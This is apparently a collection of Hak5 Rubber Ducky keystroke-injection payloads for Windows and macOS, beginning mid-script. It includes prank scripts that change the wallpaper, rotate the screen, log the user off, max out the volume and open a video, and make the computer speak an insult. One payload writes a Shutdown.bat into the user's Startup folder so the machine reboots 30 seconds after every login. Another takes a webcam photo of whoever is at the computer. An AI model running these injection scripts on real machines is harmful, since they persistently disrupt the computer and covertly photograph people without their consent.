ALT h
STRING EC
ALT r
STRING 10
TAB
STRING 0
TAB
STRING 0
ENTER
REM ****SECOND COLOR****
ALT h
STRING EC
ALT r
STRING 13
TAB
STRING 10
TAB
STRING 13
ENTER
REM ****THIRD COLOR****
ALT h
STRING EC
ALT r
STRING 100
TAB
STRING 109
TAB
STRING 99
ENTER
REM ****FOURTH COLOR****
ALT h
STRING EC
ALT r
STRING 120
TAB
STRING 101
TAB
STRING 46
ENTER
REM ****FIFTH COLOR****
ALT h
STRING EC
ALT r
STRING 0
TAB
STRING 0
TAB
STRING 101
ENTER
REM ****SIXTH COLOR****
ALT h
STRING EC
ALT r
STRING 0
TAB
STRING 0
TAB
STRING 0
ENTER

You got quacked! (Windows)

Changes the users desktop background to a Rubber Duck saying “YOU GOT QUACKED!” with a Hak5 logo

GUI d
WINDOWS
STRING https://i.imgflip.com/1dv8ac.jpg
ENTER
DELAY 100
REM Opens up window and goes to a image I created xD
CTRL s
STRING %userprofile%\Desktop\QUACKED
ENTER
REM saving the picture to the user Desktop, pic name QUACKED...
DELAY 100
GUI d
REM shows desktop
WINDOWS r
STRING %userprofile%\Desktop\QUACKED.png
ENTER
REM opens the png file
MENU
ENTER
ALT F4
REM sets the background, and closes.
GUI d
MENU
STRING v
STRING d

Restart (Windows)

REM Open the command line. You don't need admin because you are only adding to the Users Startup Directory
ESCAPE
CONTROL ESCAPE
DELAY 400
STRING cmd
ENTER
DELAY 100
REM start making Shutdown.bat
STRING copy con "%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Shutdown.bat"
STRING @echo off
ENTER
STRING shutdown /r /t 30
REM The shutdown command has many good options '/t' adds a Delay, and '/r' restarts
REM '/s' will shut the computer down and '/l' (L) is to just logoff the user more options are available by running 'shutdown /?'
ENTER
CTRL z
STRING exit
ENTER

Screen rotate (Windows)

CONTROL ESCAPE
DELAY 50
STRING Screen Resolution
DELAY 50
ENTER
DELAY 100
TAB
TAB
TAB
DOWN
DOWN
TAB
TAB
TAB
TAB
TAB
ENTER
TAB
ENTER

Log off (Windows)

DELAY 500
GUI
DELAY 150
TAB
DELAY 150
TAB
DELAY 150
ENTER

Youtube blaster (OSX)

REM This payload will open terminal, crank up the Macs volume all the way, then open a youtube video of
REM your choice by replacing the link.
DELAY 1000
GUI SPACE
STRING terminal
DELAY 500
ENTER
DELAY 4000
STRING osascript -e 'set volume 7'
DELAY 500
ENTER
DELAY 500
STRING open https://www.youtube.com/watch?v=dQw4w9WgXcQ
DELAY 500
ENTER

Photo Booth (OSX)

REM Description: This payload opens a photo booth window and automatically takes a picture. Once this picture is taken, this payload proceeds to open terminal and tell it to say "You look ugly!". This payload is great for friends and family.
REM --------------------------------
DELAY 1000
GUI SPACE
DELAY 100
STRING photo booth
DELAY 100
ENTER
DELAY 1000
ENTER
DELAY 3000
GUI SPACE
DELAY 100
STRING terminal
DELAY 100
ENTER
DELAY 1000
STRING say You look ugly!
DELAY 100
ENTER